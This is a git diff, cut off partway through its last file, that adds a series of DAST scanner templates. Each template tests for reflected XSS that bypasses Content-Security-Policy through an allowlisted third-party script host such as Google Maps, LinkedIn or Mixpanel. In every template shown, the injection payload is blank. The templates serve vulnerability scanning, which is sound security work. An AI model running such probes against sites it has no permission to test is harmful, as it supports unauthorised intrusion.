b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml new file mode 100644 index 00000000000..cd54da677fe --- /dev/null +++ b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml @@ -0,0 +1,55 @@ +id: js-hcaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via JS hCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,hcaptcha + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: js_hcaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "js_hcaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml new file mode 100644 index 00000000000..b78798f895c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml @@ -0,0 +1,55 @@ +id: js-smb-ovoenergy-csp-xss + +info: + name: Content-Security-Policy Bypass via OVO Energy JS SMB + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ovoenergy + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: js_smb_ovoenergy_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "js_smb_ovoenergy_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml new file mode 100644 index 00000000000..6bf53a6f9dd --- /dev/null +++ b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml @@ -0,0 +1,55 @@ +id: kbcprod-service-now-csp-xss + +info: + name: Content-Security-Policy Bypass via ServiceNow KBCProd + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,servicenow + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: kbcprod_service_now_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "kbcprod_service_now_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml new file mode 100644 index 00000000000..898f7fda86f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml @@ -0,0 +1,55 @@ +id: lghnh-mkt-prod1-adobe-csp-xss + +info: + name: Content-Security-Policy Bypass via Adobe Campaign + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,adobe + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lghnh_mkt_prod1_adobe_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lghnh_mkt_prod1_adobe_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml new file mode 100644 index 00000000000..cabb2a05c69 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml @@ -0,0 +1,55 @@ +id: lijit-ap-csp-xss + +info: + name: Content-Security-Policy Bypass via Lijit AP + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,lijit + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lijit_ap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lijit_ap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml new file mode 100644 index 00000000000..fd1f40c4978 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml @@ -0,0 +1,55 @@ +id: linkedin-csp-xss + +info: + name: Content-Security-Policy Bypass via LinkedIn + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,linkedin + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: linkedin_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "linkedin_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml new file mode 100644 index 00000000000..2f191e34b34 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml @@ -0,0 +1,55 @@ +id: links-disqus-csp-xss + +info: + name: Content-Security-Policy Bypass via Disqus Links + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,disqus + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: links_disqus_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "links_disqus_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml new file mode 100644 index 00000000000..a61064620a5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: livechatinc-api-csp-xss + +info: + name: Content-Security-Policy Bypass via LiveChatInc API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,livechatinc + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: livechatinc_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "livechatinc_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml new file mode 100644 index 00000000000..7ea006151c5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml @@ -0,0 +1,55 @@ +id: lpsnmedia-accdn-csp-xss + +info: + name: Content-Security-Policy Bypass via LPSN Media + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,lpsnmedia + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lpsnmedia_accdn_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lpsnmedia_accdn_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml new file mode 100644 index 00000000000..fc8c5c162f1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml @@ -0,0 +1,55 @@ +id: lptag-liveperson-csp-xss + +info: + name: Content-Security-Policy Bypass via LivePerson Tag + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,liveperson + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lptag_liveperson_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lptag_liveperson_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml new file mode 100644 index 00000000000..c8f2bbe166e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml @@ -0,0 +1,55 @@ +id: m-media-amazon-csp-xss + +info: + name: Content-Security-Policy Bypass via Amazon Media + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amazon + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: m_media_amazon_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "m_media_amazon_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml new file mode 100644 index 00000000000..fbabd40e60e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml @@ -0,0 +1,55 @@ +id: mango-buzzfeed-csp-xss + +info: + name: Content-Security-Policy Bypass via BuzzFeed Mango + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,buzzfeed + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mango_buzzfeed_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mango_buzzfeed_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml new file mode 100644 index 00000000000..055a3aa3aa0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml @@ -0,0 +1,55 @@ +id: maps-api-ssl-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps API SSL + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_api_ssl_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_api_ssl_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml new file mode 100644 index 00000000000..4adb60ce618 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml @@ -0,0 +1,55 @@ +id: maps-google-com-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_com_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_com_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml new file mode 100644 index 00000000000..763c3684728 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml @@ -0,0 +1,55 @@ +id: maps-google-de-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps DE + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_de_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_de_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml new file mode 100644 index 00000000000..319b94460b2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml @@ -0,0 +1,55 @@ +id: maps-google-lv-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps LV + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_lv_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_lv_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml new file mode 100644 index 00000000000..06669e312f2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml @@ -0,0 +1,55 @@ +id: maps-google-ru-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps RU + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_ru_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_ru_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml new file mode 100644 index 00000000000..7963c3d4700 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml @@ -0,0 +1,55 @@ +id: maps-googleapis-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_googleapis_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_googleapis_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml new file mode 100644 index 00000000000..f93be9aad40 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml @@ -0,0 +1,55 @@ +id: marketo-app-sjint-csp-xss + +info: + name: Content-Security-Policy Bypass via Marketo App SJINT + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,marketo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: marketo_app_sjint_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "marketo_app_sjint_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml new file mode 100644 index 00000000000..12967e9416e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml @@ -0,0 +1,55 @@ +id: mc-yandex-csp-xss + +info: + name: Content-Security-Policy Bypass via Yandex MC + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mc_yandex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mc_yandex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml new file mode 100644 index 00000000000..04aa67fd4ea --- /dev/null +++ b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: meetup-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Meetup API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,meetup + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: meetup_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "meetup_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml new file mode 100644 index 00000000000..90d56f30f7a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml @@ -0,0 +1,55 @@ +id: mi-huodong-csp-xss + +info: + name: Content-Security-Policy Bypass via Mi Huodong + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mi + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mi_huodong_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mi_huodong_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml new file mode 100644 index 00000000000..9f9d9978605 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: microsoft-translator-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Microsoft Translator API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,microsoft + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: microsoft_translator_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "microsoft_translator_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml new file mode 100644 index 00000000000..e421bc694ba --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: mixpanel-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Mixpanel API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mixpanel + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mixpanel_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mixpanel_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml new file mode 100644 index 00000000000..1ec82002902 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml @@ -0,0 +1,55 @@ +id: nominatim-openstreetmap-csp-xss + +info: + name: Content-Security-Policy Bypass via OpenStreetMap Nominatim + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,openstreetmap + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: nominatim_openstreetmap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "nominatim_openstreetmap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml new file mode 100644 index 00000000000..8b4cc510235 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml @@ -0,0 +1,55 @@ +id: oamssoqae-ieee-csp-xss + +info: + name: Content-Security-Policy Bypass via IEEE OAMSSOQAE + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ieee + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: 